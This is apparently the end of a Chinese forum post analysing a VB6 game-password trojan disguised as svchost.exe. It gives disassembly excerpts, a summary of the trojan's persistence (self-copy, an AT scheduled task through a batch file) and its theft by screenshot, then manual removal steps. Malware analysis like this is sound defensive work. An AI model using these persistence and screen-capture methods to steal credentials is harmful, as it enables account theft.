  233. 7340CEF3 |. FF75 0C push [arg.2] ; |wParam
  234. 7340CEF6 |. FF75 08 push [arg.1] ; |HookCode
  235. 7340CEF9 |. FFB0 6C020000 push dword ptr ds:[eax+26C] ; |hHook
  236. 7340CEFF |. FF15 C8143973 call dword ptr ds:[<&USER32.CallNex>; \CallNextHookEx

  237. 004033B0   $  A1 80574100   mov eax,dword ptr ds:[415780]
  238. 004033B5   .  0BC0          or eax,eax
  239. 004033B7   .  74 02         je short svchost.004033BB
  240. 004033B9   .  FFE0          jmp eax
  241. 004033BB   >  68 98334000   push svchost.00403398                    ;  user32
  242. 004033C0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  243. 004033C5   .  FFD0          call eax
  244. 004033C7   .  FFE0          jmp eax                                  ;  GetDC


  245. 733A1BAF . 57 push edi ; /hDC => NULL
  246. 733A1BB0 . FF15 D0163973 call dword ptr ds:[<&GDI32.CreateCompati>; \CreateCompatibleDC
  247. 733A1BB6 . 3BC7 cmp eax,edi
  248. 733A1BB8 . 8986 640E0000 mov dword ptr ds:[esi+E64],eax
  249. 733A1BBE . 0F84 6F590200 je msvbvm60.733C7533
  250. 733A1BC4 . 6A 07 push 7 ; /ObjectType = OBJ_BITMAP
  251. 733A1BC6 . 50 push eax ; |hDC
  252. 733A1BC7 . FF15 50173973 call dword ptr ds:[<&GDI32.GetCurrentObj>; \GetCurrentObject

  253. 004059AB   > \68 88594000   push svchost.00405988                    ;  GDIPlus
  254. 004059B0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  255. 004059B5   .  FFD0          call eax
  256. 004059B7   .  FFE0          jmp eax                                  ;  GdipSaveImageToFile


  257. 0040D51A . 68 704E4000 push svchost.00404E70 ; /\Pusmint\jietu.jpg
  258. 0040D51F . FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; \__vbaStrCat
  259. 0040D525 . 8945 A0 mov dword ptr ss:[ebp-60],eax
  260. 0040D528 . C745 98 08000>mov dword ptr ss:[ebp-68],8
  261. 0040D52F . 6A 00 push 0
  262. 0040D531 . 8D55 98 lea edx,dword ptr ss:[ebp-68]
  263. 0040D534 . 52 push edx


  264. 00411B52 . 68 305C4000 push svchost.00405C30 ; Write
  265. 00411B57 . 894A 04 mov dword ptr ds:[edx+4],ecx
  266. 00411B5A . 8B4D D4 mov ecx,dword ptr ss:[ebp-2C]
  267. 00411B5D . 53 push ebx
  268. 00411B5E . 68 1C5C4000 push svchost.00405C1C ; Document
  269. 00411B63 . 8942 08 mov dword ptr ds:[edx+8],eax
  270. 00411B66 . 8B45 90 mov eax,dword ptr ss:[ebp-70]
  271. 00411B69 . 51 push ecx
  272. 00411B6A . 8942 0C mov dword ptr ds:[edx+C],eax
  273. 00411B6D . 8D55 B4 lea edx,dword ptr ss:[ebp-4C]
  274. 00411B70 . 52 push edx
  275. 00411B71 . FFD7 call edi
  276. 00411B73 . 83C4 10 add esp,10
  277. 00411B76 . 50 push eax
  278. 00411B77 . FF15 D0F04100 call dword ptr ds:[<&msvbvm60.__vbaObj>; msvbvm60.__vbaObjVar
  279. 00411B7D . 50 push eax
  280. 00411B7E . FF15 CCF14100 call dword ptr ds:[<&msvbvm60.__vbaLat>; msvbvm60.__vbaLateMemCall
  281. 00411B84 . 83C4 1C add esp,1C
  282. 00411B87 . 8D4D B4 lea ecx,dword ptr ss:[ebp-4C]
  283. 00411B8A . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
  284. 00411B90 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
  285. 00411B93 . 53 push ebx
  286. 00411B94 . 68 3C5C4000 push svchost.00405C3C ; hwnd
  287. 00411B99 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
  288. 00411B9C . 50 push eax
  289. 00411B9D . 51 push ecx
  290. 00411B9E . FFD7 call edi
  291. 00411BA0 . 83C4 10 add esp,10
  292. 00411BA3 . 8D55 C4 lea edx,dword ptr ss:[ebp-3C]
  293. 00411BA6 . 68 4C5C4000 push svchost.00405C4C ; Internet Explorer_Server
  294. 00411BAB . 52 push edx
  295. 00411BAC . FF15 C0F14100 call dword ptr ds:[<&msvbvm60.__vbaI4V>; msvbvm60.__vbaI4Var
  296. 00411BB2 . 50 push eax
  297. 00411BB3 . E8 E8030000 call svchost.00411FA0
  298. 00411BB8 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
  299. 00411BBB . 8945 E8 mov dword ptr ss:[ebp-18],eax
  300. 00411BBE . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
  301. 00411BC4 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
  302. 00411BC7 . 53 push ebx
  303. 00411BC8 . 68 9C5C4000 push svchost.00405C9C ; focus
  304. 00411BCD . 53 push ebx
  305. 00411BCE . 68 885C4000 push svchost.00405C88 ; fileField
  306. 00411BD3 . 53 push ebx
  307. 00411BD4 . 68 805C4000 push svchost.00405C80 ; All
  308. 00411BD9 . 53 push ebx
  309. 00411BDA . 68 1C5C4000 push svchost.00405C1C ; Document
總結:
1.獲取指定目錄並創建目錄,自我複製到該目錄,然後運行。

2.創建bat(SystemDir.bat),以計劃任務(AT命令,每半小時一次)在指定時間運行木馬。

3.結束自身。

4.複製後的程序通過查找窗口,枚舉進程方法獲取遊戲窗口截取密碼。

5.至於密保就是利用截屏,然後發送到指定地址。

由於本人能力的有限,錯誤及遺漏在所難免! 或許原理並沒有這麼簡單,還請其他高手作出指點. 萬分感謝!


查殺方法:

首先用XueTr.exe結束木馬的svchost.exe進程(注意只結束路徑為C:\WINDOWS\system32\Pusmint\svchost.exe的那一個,不要誤殺系統本身的svchost.exe;進程不先結束就無法刪除檔案),然後

到這個目錄刪除C:\WINDOWS\system32\Pusmint下所有的文件。

然後運行XueTr.exe切換到啟動項就明朗了,直接delete那些*.JOB的項目(即SystemDir.bat用AT命令建立的計劃任務)。






